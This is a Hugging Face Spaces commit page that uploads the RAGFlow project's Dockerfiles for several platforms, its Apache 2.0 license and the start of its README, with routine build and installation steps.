Spaces:
Paused
Paused
jianglinzhang
committed on
Commit
•
1192360
1
Parent(s):
8a44cb6
Upload 14 files
Browse files- Dockerfile.arm +43 -0
- Dockerfile.cuda +27 -0
- Dockerfile.scratch +56 -0
- Dockerfile.scratch.oc9 +58 -0
- LICENSE +201 -0
- README.md +342 -11
- README_ja.md +289 -0
- README_ko.md +325 -0
- README_zh.md +329 -0
- SECURITY.md +74 -0
- printEnvironment.sh +67 -0
- requirements.txt +104 -0
- requirements_arm.txt +175 -0
Dockerfile.arm
ADDED
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# RAGFlow image for ARM hosts, based on the official Python 3.11 image.
# Installs the Python requirements, Node.js 20 (used to build the web UI),
# nginx, ffmpeg and a Rust toolchain, then copies in the application sources.
FROM python:3.11
USER root

# Run every RUN step under bash with pipefail so that a failed download in a
# `curl ... | bash` pipeline fails the build instead of being silently ignored.
SHELL ["/bin/bash", "-o", "pipefail", "-c"]

WORKDIR /ragflow

# The ARM-specific requirement list is stored under the generic file name.
COPY requirements_arm.txt /ragflow/requirements.txt

RUN pip install --no-cache-dir nltk --default-timeout=10000

# Install the Python dependencies from the Aliyun PyPI mirror, then download
# the NLTK "punkt" and "wordnet" data at build time.
RUN pip install --no-cache-dir -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt && \
    python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"

RUN apt-get update && \
    apt-get install -y curl gnupg && \
    rm -rf /var/lib/apt/lists/*

# Run the NodeSource setup script for Node.js 20, install the system packages,
# and drop the apt package lists in the same layer so they are not kept in the
# image.
RUN curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
    apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1 && \
    rm -rf /var/lib/apt/lists/*

# Install a Rust toolchain via rustup and expose cargo on PATH.
# NOTE(review): presumably required to build graspologic's dependencies below - confirm.
RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
ENV PATH="/root/.cargo/bin:${PATH}"

RUN pip install --no-cache-dir graspologic

# Build the web front end.
COPY ./web ./web
RUN cd ./web && npm i --force && npm run build

# Application sources (plain directory copies, so COPY rather than ADD).
COPY ./api ./api
COPY ./conf ./conf
COPY ./deepdoc ./deepdoc
COPY ./rag ./rag
COPY ./agent ./agent
COPY ./graphrag ./graphrag

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

COPY docker/entrypoint.sh ./entrypoint.sh
# NOTE(review): docker/.env is copied into the image. The project README
# describes this file as holding settings such as MYSQL_PASSWORD and
# MINIO_PASSWORD, so confirm the image is never published with real credentials.
COPY docker/.env ./
RUN chmod +x ./entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]
|
Dockerfile.cuda
ADDED
@@ -0,0 +1,27 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# RAGFlow image for CUDA hosts, layered on the prebuilt ragflow-base image.
FROM infiniflow/ragflow-base:v2.0
USER root

WORKDIR /ragflow

## for cuda > 12.0
# Replace onnxruntime-gpu with the build published on the onnxruntime-cuda-12
# package index. Uninstall and install share one layer: removing files in a
# separate layer would not reduce the image size.
RUN pip uninstall -y onnxruntime-gpu && \
    pip install --no-cache-dir onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/

# Build the web front end.
# NOTE(review): assumes npm is already provided by the base image - confirm.
COPY ./web ./web
RUN cd ./web && npm i --force && npm run build

# Application sources (plain directory copies, so COPY rather than ADD).
COPY ./api ./api
COPY ./conf ./conf
COPY ./deepdoc ./deepdoc
COPY ./rag ./rag
COPY ./agent ./agent
COPY ./graphrag ./graphrag

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

COPY docker/entrypoint.sh ./entrypoint.sh
RUN chmod +x ./entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]
|
Dockerfile.scratch
ADDED
@@ -0,0 +1,56 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# RAGFlow image built from a plain Ubuntu 22.04 base: Miniconda with a
# Python 3.11 environment named "py11", Node.js, nginx and OpenMPI, followed by
# the application sources and their Python requirements.
FROM ubuntu:22.04
USER root

# Run every RUN step under bash with pipefail so that a failed download in a
# `curl ... | bash` pipeline fails the build instead of being silently ignored.
SHELL ["/bin/bash", "-o", "pipefail", "-c"]

WORKDIR /ragflow

RUN apt-get update && \
    apt-get install -y wget curl build-essential libopenmpi-dev && \
    rm -rf /var/lib/apt/lists/*

# Install Miniconda (x86_64 installer) under /root/miniconda3 and register
# conda for login and interactive shells.
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
    bash ~/miniconda.sh -b -p /root/miniconda3 && \
    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
    echo "conda activate base" >> ~/.bashrc

ENV PATH=/root/miniconda3/bin:$PATH

RUN conda create -y --name py11 python=3.11

# Kept as separate ENV instructions: PATH below refers to the CONDA_PREFIX set
# by the preceding instruction.
ENV CONDA_DEFAULT_ENV=py11
ENV CONDA_PREFIX=/root/miniconda3/envs/py11
ENV PATH=$CONDA_PREFIX/bin:$PATH

# Node.js from NodeSource (same major version as Dockerfile.arm) plus nginx.
# Install and list cleanup share the layer in which the setup script ran.
RUN curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
    apt-get install -y nodejs nginx && \
    rm -rf /var/lib/apt/lists/*

# Application sources (plain copies, so COPY rather than ADD).
COPY ./web ./web
COPY ./api ./api
COPY ./conf ./conf
COPY ./deepdoc ./deepdoc
COPY ./rag ./rag
COPY ./requirements.txt ./requirements.txt
COPY ./agent ./agent
COPY ./graphrag ./graphrag

# `-y` is required: without it the install aborts at the confirmation prompt
# in a non-interactive build whenever a package still has to be installed.
RUN apt-get update && \
    apt-get install -y openmpi-bin openmpi-common libopenmpi-dev && \
    rm -rf /var/lib/apt/lists/*
ENV LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
# NOTE(review): presumably removed so that native extensions built by pip link
# with the system ld instead of conda's compatibility linker - confirm.
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
RUN cd ./web && npm i --force && npm run build
RUN conda run -n py11 pip install --no-cache-dir -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt

RUN apt-get update && \
    apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
    rm -rf /var/lib/apt/lists/*

RUN conda run -n py11 pip install --no-cache-dir -i https://mirrors.aliyun.com/pypi/simple/ ollama
RUN conda run -n py11 python -m nltk.downloader punkt
RUN conda run -n py11 python -m nltk.downloader wordnet

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

COPY docker/entrypoint.sh ./entrypoint.sh
RUN chmod +x ./entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]
|
Dockerfile.scratch.oc9
ADDED
@@ -0,0 +1,58 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# RAGFlow image built from an OpenCloudOS 9.0 base: Miniconda with a
# Python 3.11 environment named "py11", Node.js, nginx and OpenMPI, followed by
# the application sources and their Python requirements (minus mpi4py).
FROM opencloudos/opencloudos:9.0
USER root

WORKDIR /ragflow

RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel && dnf clean all

# Install Miniconda (x86_64 installer) under /root/miniconda3 and register
# conda for login and interactive shells.
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
    bash ~/miniconda.sh -b -p /root/miniconda3 && \
    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
    echo "conda activate base" >> ~/.bashrc

ENV PATH=/root/miniconda3/bin:$PATH

RUN conda create -y --name py11 python=3.11

# Kept as separate ENV instructions: PATH below refers to the CONDA_PREFIX set
# by the preceding instruction.
ENV CONDA_DEFAULT_ENV=py11
ENV CONDA_PREFIX=/root/miniconda3/envs/py11
ENV PATH=$CONDA_PREFIX/bin:$PATH

# Node.js and nginx come from the distribution repositories; the NodeSource
# setup step is left disabled as in the original.
# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
RUN dnf install -y nodejs nginx && dnf clean all

# Application sources (plain copies, so COPY rather than ADD).
COPY ./web ./web
COPY ./api ./api
COPY ./conf ./conf
COPY ./deepdoc ./deepdoc
COPY ./rag ./rag
COPY ./requirements.txt ./requirements.txt
COPY ./agent ./agent
COPY ./graphrag ./graphrag

RUN dnf install -y openmpi openmpi-devel python3-openmpi && dnf clean all
ENV C_INCLUDE_PATH=/usr/include/openmpi-x86_64:$C_INCLUDE_PATH
ENV LD_LIBRARY_PATH=/usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
# NOTE(review): presumably removed so that native extensions built by pip link
# with the system ld instead of conda's compatibility linker - confirm.
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
RUN cd ./web && npm i --force && npm run build
# Install every requirement except mpi4py (without mpi4py==3.1.5). The filtered
# list is written to a file and passed with -r so that requirement lines
# containing spaces, environment markers or comments are parsed by pip instead
# of being word-split by the shell.
RUN grep -ivE "mpi4py" ./requirements.txt > /tmp/requirements.no-mpi4py.txt && \
    conda run -n py11 pip install --no-cache-dir -r /tmp/requirements.no-mpi4py.txt && \
    rm /tmp/requirements.no-mpi4py.txt
RUN conda run -n py11 pip install --no-cache-dir redis

RUN dnf update -y && \
    dnf install -y glib2 mesa-libGL && \
    dnf clean all

RUN conda run -n py11 pip install --no-cache-dir ollama
RUN conda run -n py11 python -m nltk.downloader punkt
RUN conda run -n py11 python -m nltk.downloader wordnet

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

COPY docker/entrypoint.sh ./entrypoint.sh
RUN chmod +x ./entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]
|
LICENSE
ADDED
@@ -0,0 +1,201 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
Apache License
|
2 |
+
Version 2.0, January 2004
|
3 |
+
http://www.apache.org/licenses/
|
4 |
+
|
5 |
+
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
6 |
+
|
7 |
+
1. Definitions.
|
8 |
+
|
9 |
+
"License" shall mean the terms and conditions for use, reproduction,
|
10 |
+
and distribution as defined by Sections 1 through 9 of this document.
|
11 |
+
|
12 |
+
"Licensor" shall mean the copyright owner or entity authorized by
|
13 |
+
the copyright owner that is granting the License.
|
14 |
+
|
15 |
+
"Legal Entity" shall mean the union of the acting entity and all
|
16 |
+
other entities that control, are controlled by, or are under common
|
17 |
+
control with that entity. For the purposes of this definition,
|
18 |
+
"control" means (i) the power, direct or indirect, to cause the
|
19 |
+
direction or management of such entity, whether by contract or
|
20 |
+
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
21 |
+
outstanding shares, or (iii) beneficial ownership of such entity.
|
22 |
+
|
23 |
+
"You" (or "Your") shall mean an individual or Legal Entity
|
24 |
+
exercising permissions granted by this License.
|
25 |
+
|
26 |
+
"Source" form shall mean the preferred form for making modifications,
|
27 |
+
including but not limited to software source code, documentation
|
28 |
+
source, and configuration files.
|
29 |
+
|
30 |
+
"Object" form shall mean any form resulting from mechanical
|
31 |
+
transformation or translation of a Source form, including but
|
32 |
+
not limited to compiled object code, generated documentation,
|
33 |
+
and conversions to other media types.
|
34 |
+
|
35 |
+
"Work" shall mean the work of authorship, whether in Source or
|
36 |
+
Object form, made available under the License, as indicated by a
|
37 |
+
copyright notice that is included in or attached to the work
|
38 |
+
(an example is provided in the Appendix below).
|
39 |
+
|
40 |
+
"Derivative Works" shall mean any work, whether in Source or Object
|
41 |
+
form, that is based on (or derived from) the Work and for which the
|
42 |
+
editorial revisions, annotations, elaborations, or other modifications
|
43 |
+
represent, as a whole, an original work of authorship. For the purposes
|
44 |
+
of this License, Derivative Works shall not include works that remain
|
45 |
+
separable from, or merely link (or bind by name) to the interfaces of,
|
46 |
+
the Work and Derivative Works thereof.
|
47 |
+
|
48 |
+
"Contribution" shall mean any work of authorship, including
|
49 |
+
the original version of the Work and any modifications or additions
|
50 |
+
to that Work or Derivative Works thereof, that is intentionally
|
51 |
+
submitted to Licensor for inclusion in the Work by the copyright owner
|
52 |
+
or by an individual or Legal Entity authorized to submit on behalf of
|
53 |
+
the copyright owner. For the purposes of this definition, "submitted"
|
54 |
+
means any form of electronic, verbal, or written communication sent
|
55 |
+
to the Licensor or its representatives, including but not limited to
|
56 |
+
communication on electronic mailing lists, source code control systems,
|
57 |
+
and issue tracking systems that are managed by, or on behalf of, the
|
58 |
+
Licensor for the purpose of discussing and improving the Work, but
|
59 |
+
excluding communication that is conspicuously marked or otherwise
|
60 |
+
designated in writing by the copyright owner as "Not a Contribution."
|
61 |
+
|
62 |
+
"Contributor" shall mean Licensor and any individual or Legal Entity
|
63 |
+
on behalf of whom a Contribution has been received by Licensor and
|
64 |
+
subsequently incorporated within the Work.
|
65 |
+
|
66 |
+
2. Grant of Copyright License. Subject to the terms and conditions of
|
67 |
+
this License, each Contributor hereby grants to You a perpetual,
|
68 |
+
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
69 |
+
copyright license to reproduce, prepare Derivative Works of,
|
70 |
+
publicly display, publicly perform, sublicense, and distribute the
|
71 |
+
Work and such Derivative Works in Source or Object form.
|
72 |
+
|
73 |
+
3. Grant of Patent License. Subject to the terms and conditions of
|
74 |
+
this License, each Contributor hereby grants to You a perpetual,
|
75 |
+
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
76 |
+
(except as stated in this section) patent license to make, have made,
|
77 |
+
use, offer to sell, sell, import, and otherwise transfer the Work,
|
78 |
+
where such license applies only to those patent claims licensable
|
79 |
+
by such Contributor that are necessarily infringed by their
|
80 |
+
Contribution(s) alone or by combination of their Contribution(s)
|
81 |
+
with the Work to which such Contribution(s) was submitted. If You
|
82 |
+
institute patent litigation against any entity (including a
|
83 |
+
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
84 |
+
or a Contribution incorporated within the Work constitutes direct
|
85 |
+
or contributory patent infringement, then any patent licenses
|
86 |
+
granted to You under this License for that Work shall terminate
|
87 |
+
as of the date such litigation is filed.
|
88 |
+
|
89 |
+
4. Redistribution. You may reproduce and distribute copies of the
|
90 |
+
Work or Derivative Works thereof in any medium, with or without
|
91 |
+
modifications, and in Source or Object form, provided that You
|
92 |
+
meet the following conditions:
|
93 |
+
|
94 |
+
(a) You must give any other recipients of the Work or
|
95 |
+
Derivative Works a copy of this License; and
|
96 |
+
|
97 |
+
(b) You must cause any modified files to carry prominent notices
|
98 |
+
stating that You changed the files; and
|
99 |
+
|
100 |
+
(c) You must retain, in the Source form of any Derivative Works
|
101 |
+
that You distribute, all copyright, patent, trademark, and
|
102 |
+
attribution notices from the Source form of the Work,
|
103 |
+
excluding those notices that do not pertain to any part of
|
104 |
+
the Derivative Works; and
|
105 |
+
|
106 |
+
(d) If the Work includes a "NOTICE" text file as part of its
|
107 |
+
distribution, then any Derivative Works that You distribute must
|
108 |
+
include a readable copy of the attribution notices contained
|
109 |
+
within such NOTICE file, excluding those notices that do not
|
110 |
+
pertain to any part of the Derivative Works, in at least one
|
111 |
+
of the following places: within a NOTICE text file distributed
|
112 |
+
as part of the Derivative Works; within the Source form or
|
113 |
+
documentation, if provided along with the Derivative Works; or,
|
114 |
+
within a display generated by the Derivative Works, if and
|
115 |
+
wherever such third-party notices normally appear. The contents
|
116 |
+
of the NOTICE file are for informational purposes only and
|
117 |
+
do not modify the License. You may add Your own attribution
|
118 |
+
notices within Derivative Works that You distribute, alongside
|
119 |
+
or as an addendum to the NOTICE text from the Work, provided
|
120 |
+
that such additional attribution notices cannot be construed
|
121 |
+
as modifying the License.
|
122 |
+
|
123 |
+
You may add Your own copyright statement to Your modifications and
|
124 |
+
may provide additional or different license terms and conditions
|
125 |
+
for use, reproduction, or distribution of Your modifications, or
|
126 |
+
for any such Derivative Works as a whole, provided Your use,
|
127 |
+
reproduction, and distribution of the Work otherwise complies with
|
128 |
+
the conditions stated in this License.
|
129 |
+
|
130 |
+
5. Submission of Contributions. Unless You explicitly state otherwise,
|
131 |
+
any Contribution intentionally submitted for inclusion in the Work
|
132 |
+
by You to the Licensor shall be under the terms and conditions of
|
133 |
+
this License, without any additional terms or conditions.
|
134 |
+
Notwithstanding the above, nothing herein shall supersede or modify
|
135 |
+
the terms of any separate license agreement you may have executed
|
136 |
+
with Licensor regarding such Contributions.
|
137 |
+
|
138 |
+
6. Trademarks. This License does not grant permission to use the trade
|
139 |
+
names, trademarks, service marks, or product names of the Licensor,
|
140 |
+
except as required for reasonable and customary use in describing the
|
141 |
+
origin of the Work and reproducing the content of the NOTICE file.
|
142 |
+
|
143 |
+
7. Disclaimer of Warranty. Unless required by applicable law or
|
144 |
+
agreed to in writing, Licensor provides the Work (and each
|
145 |
+
Contributor provides its Contributions) on an "AS IS" BASIS,
|
146 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
147 |
+
implied, including, without limitation, any warranties or conditions
|
148 |
+
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
149 |
+
PARTICULAR PURPOSE. You are solely responsible for determining the
|
150 |
+
appropriateness of using or redistributing the Work and assume any
|
151 |
+
risks associated with Your exercise of permissions under this License.
|
152 |
+
|
153 |
+
8. Limitation of Liability. In no event and under no legal theory,
|
154 |
+
whether in tort (including negligence), contract, or otherwise,
|
155 |
+
unless required by applicable law (such as deliberate and grossly
|
156 |
+
negligent acts) or agreed to in writing, shall any Contributor be
|
157 |
+
liable to You for damages, including any direct, indirect, special,
|
158 |
+
incidental, or consequential damages of any character arising as a
|
159 |
+
result of this License or out of the use or inability to use the
|
160 |
+
Work (including but not limited to damages for loss of goodwill,
|
161 |
+
work stoppage, computer failure or malfunction, or any and all
|
162 |
+
other commercial damages or losses), even if such Contributor
|
163 |
+
has been advised of the possibility of such damages.
|
164 |
+
|
165 |
+
9. Accepting Warranty or Additional Liability. While redistributing
|
166 |
+
the Work or Derivative Works thereof, You may choose to offer,
|
167 |
+
and charge a fee for, acceptance of support, warranty, indemnity,
|
168 |
+
or other liability obligations and/or rights consistent with this
|
169 |
+
License. However, in accepting such obligations, You may act only
|
170 |
+
on Your own behalf and on Your sole responsibility, not on behalf
|
171 |
+
of any other Contributor, and only if You agree to indemnify,
|
172 |
+
defend, and hold each Contributor harmless for any liability
|
173 |
+
incurred by, or claims asserted against, such Contributor by reason
|
174 |
+
of your accepting any such warranty or additional liability.
|
175 |
+
|
176 |
+
END OF TERMS AND CONDITIONS
|
177 |
+
|
178 |
+
APPENDIX: How to apply the Apache License to your work.
|
179 |
+
|
180 |
+
To apply the Apache License to your work, attach the following
|
181 |
+
boilerplate notice, with the fields enclosed by brackets "[]"
|
182 |
+
replaced with your own identifying information. (Don't include
|
183 |
+
the brackets!) The text should be enclosed in the appropriate
|
184 |
+
comment syntax for the file format. We also recommend that a
|
185 |
+
file or class name and description of purpose be included on the
|
186 |
+
same "printed page" as the copyright notice for easier
|
187 |
+
identification within third-party archives.
|
188 |
+
|
189 |
+
Copyright [yyyy] [name of copyright owner]
|
190 |
+
|
191 |
+
Licensed under the Apache License, Version 2.0 (the "License");
|
192 |
+
you may not use this file except in compliance with the License.
|
193 |
+
You may obtain a copy of the License at
|
194 |
+
|
195 |
+
http://www.apache.org/licenses/LICENSE-2.0
|
196 |
+
|
197 |
+
Unless required by applicable law or agreed to in writing, software
|
198 |
+
distributed under the License is distributed on an "AS IS" BASIS,
|
199 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
200 |
+
See the License for the specific language governing permissions and
|
201 |
+
limitations under the License.
|
README.md
CHANGED
@@ -1,11 +1,342 @@
|
|
1 |
-
|
2 |
-
|
3 |
-
|
4 |
-
|
5 |
-
|
6 |
-
|
7 |
-
|
8 |
-
|
9 |
-
|
10 |
-
|
11 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
22 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
23 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
24 |
+
</a>
|
25 |
+
</p>
|
26 |
+
|
27 |
+
<h4 align="center">
|
28 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
29 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
30 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
31 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
32 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
33 |
+
</h4>
|
34 |
+
|
35 |
+
<details open>
|
36 |
+
<summary><b>📕 Table of Contents</b></summary>
|
37 |
+
|
38 |
+
- 💡 [What is RAGFlow?](#-what-is-ragflow)
|
39 |
+
- 🎮 [Demo](#-demo)
|
40 |
+
- 🔥 [Latest Updates](#-latest-updates)
|
41 |
+
- 🌟 [Key Features](#-key-features)
|
42 |
+
- 🔎 [System Architecture](#-system-architecture)
|
43 |
+
- 🎬 [Get Started](#-get-started)
|
44 |
+
- 🔧 [Configurations](#-configurations)
|
45 |
+
- 🛠️ [Build from source](#-build-from-source)
|
46 |
+
- 🛠️ [Launch service from source](#-launch-service-from-source)
|
47 |
+
- 📚 [Documentation](#-documentation)
|
48 |
+
- 📜 [Roadmap](#-roadmap)
|
49 |
+
- 🏄 [Community](#-community)
|
50 |
+
- 🙌 [Contributing](#-contributing)
|
51 |
+
|
52 |
+
</details>
|
53 |
+
|
54 |
+
## 💡 What is RAGFlow?
|
55 |
+
|
56 |
+
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
57 |
+
|
58 |
+
## 🎮 Demo
|
59 |
+
|
60 |
+
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
61 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
62 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
63 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
64 |
+
</div>
|
65 |
+
|
66 |
+
|
67 |
+
## 🔥 Latest Updates
|
68 |
+
|
69 |
+
- 2024-09-13 Adds search mode for knowledge base Q&A.
|
70 |
+
